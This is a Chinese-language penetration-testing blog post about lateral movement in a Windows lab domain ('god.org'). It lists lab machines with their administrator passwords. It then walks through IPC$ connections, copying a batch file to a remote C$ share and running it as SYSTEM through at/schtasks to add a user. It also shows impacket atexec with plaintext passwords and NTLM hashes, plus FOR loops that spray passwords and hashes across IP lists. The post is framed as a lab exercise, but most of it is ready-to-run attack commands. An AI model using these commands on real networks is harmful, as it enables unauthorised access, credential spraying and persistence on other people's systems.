内网机器结构
机器账号密码如下:
2008 r2 webserver 域内 web 服务器 本地管理员账号密码 : .\administraotr:admin!@#45 当前机器域用户密码 : god\webadmin:admin!@#45
2003 x86 fileserver 域内文件服务器 本地管理员账号密码 : administrator : admin 当前机器域用户密码 : god\fileadmin : Admin12345
2008 r2 x64 dc god.org 主域控机器 域管账号密码: God\administrator : Admin12345
2012 sqlserver 域内数据库服务器 本地管理员账号密码 : .\administrator:admin!@#45 当前机器域用户密码 : god\dbadmin:admin!@#45
w7 x64 mary-pc 域内个人机 本地管理员账号密码 : .\mary : admin 当前机器域用户密码 : god\mary : admin!@#45
w8.1 x64 jack-pc 域内个人机 本地管理员账号密码 : .\jack : admin 当前机器域用户密码 : god\boss : Admin12345
(1)横向渗透明文传递at&schtasks
在拿下了一台内网主机之后,通过本地信息收集用户凭证等信息之后,为了拿下更多的主机,可以使用at&schtasks命令,在已知目标系统的明文用户明文密码的基础上,直接可以在远程主机上执行命令
比方说:1.获取到了某域内主机的权限
2.通过minikatz得到了明文密码
3.用信息收集到域中的用户列表作为用户名字典
4.用得到的明文密码作为密码字典
5.尝试连接
6.创建计划任务(at|schtasks)
7.执行文件可以是后门代码或者相关命令
- 利用流程:
1.建立IPC连接到目标主机
2.拷贝要执行的命令脚本到目标主机
3.查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
4.删除IPC连接
- 命令:
net use \\server\ipc$"password" /user:username # 工作组
net use \\server\ipc$"password" /user:domain\username #域内
dir \\xx.xx.xx.xx\C$\ # 查看文件列表
copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下载文件
copy 1.bat \\xx.xx.xx.xx\C$ # 复制文件
net use \\xx.xx.xx.xx\C$\1.bat /del # 删除
IPC net view xx.xx.xx.xx # 查看对方共享
- 建立 IPC 常见的错误代码
(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
(2)51:网络问题,Windows 无法找到网络路径
(3)53:找不到网络路径,可能是 IP 地址错误、目标未开机、目标 Lanmanserver 服务未启动、有 防火墙等问题
(4)67:找不到网络名,本地 Lanmanworkstation 服务未启动,目标删除 ipc$
(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立 IPC$,需要先删除
(6)1326:账号密码错误
(7)1792:目标 NetLogon 服务未启动,连接域控常常会出现此情况
(8)2242:用户密码过期,目标有账号策略,强制定期更改密码
- 建立 IPC 失败的原因
(1)目标系统不是 NT 或以上的操作系统
(2)对方没有打开 IPC$共享
(3)对方未开启 139、445 端口,或者被防火墙屏蔽
(4)输出命令、账号密码有错误
- [at] & [schtasks]的操作过程
at要在Windows2012以下版本使用
1 net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\ad 2 ministrator # 建立 ipc 连接 3 copy add.bat \\192.168.3.21\c$ #拷贝执行文件到目标机器 4 at \\192.168.3.21 15:47 c:\add.bat #添加计划任务
schtasks要在Windows2012及以上版本使用
1 net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\ad 2 ministrator # 建立 ipc 连接: 3 copy add.bat \\192.168.3.32\c$ #复制文件到其 C 盘 4 schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务 对应执行文件 5 schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务 6 schtasks /delete /s 192.168.3.21 /tn adduser /f#删除 adduser 任务
at命令实际操作:
使用net use命令连接域控主机,假设已经知道域控的账号密码
然后将以下脚本写入add.bat
将脚本写入域控的C盘中
可以看到文件成功写入了
创建定时任务,执行add操作
可以看到leslie用户成功的被添加上去了
schtasks命令实际操作:
域用户无法操作,因此需要去连接本地administrator
连接
然后就使用即可
4 schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务 对应执行文件 5 schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务 6 schtasks /delete /s 192.168.3.21 /tn adduser /f#删除 adduser 任务
- atexec-impacket的使用
atexec.exe ./administrator:[email protected] "whoami"
atexec.exe god/administrator:[email protected] "whoami"
atexec.exe -hashes :ccef208c6485269c20db2cad21734fe7 ./[email protected] "whoami"
#案例 3-横向渗透明文 HASH 传递批量利用-综合
FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量检测 IP 对应明文 连接
FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测 IP 对应明文 回显版
FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%[email protected] whoami #批量检测明文对应 IP 回显版
FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./[email protected] whoami #批量检测 HASH 对应 IP 回显版
标签:administrator,schtasks,adduser,渗透,192.168,admin,xx,impacket From: https://www.cnblogs.com/LeslieSec/p/17031043.html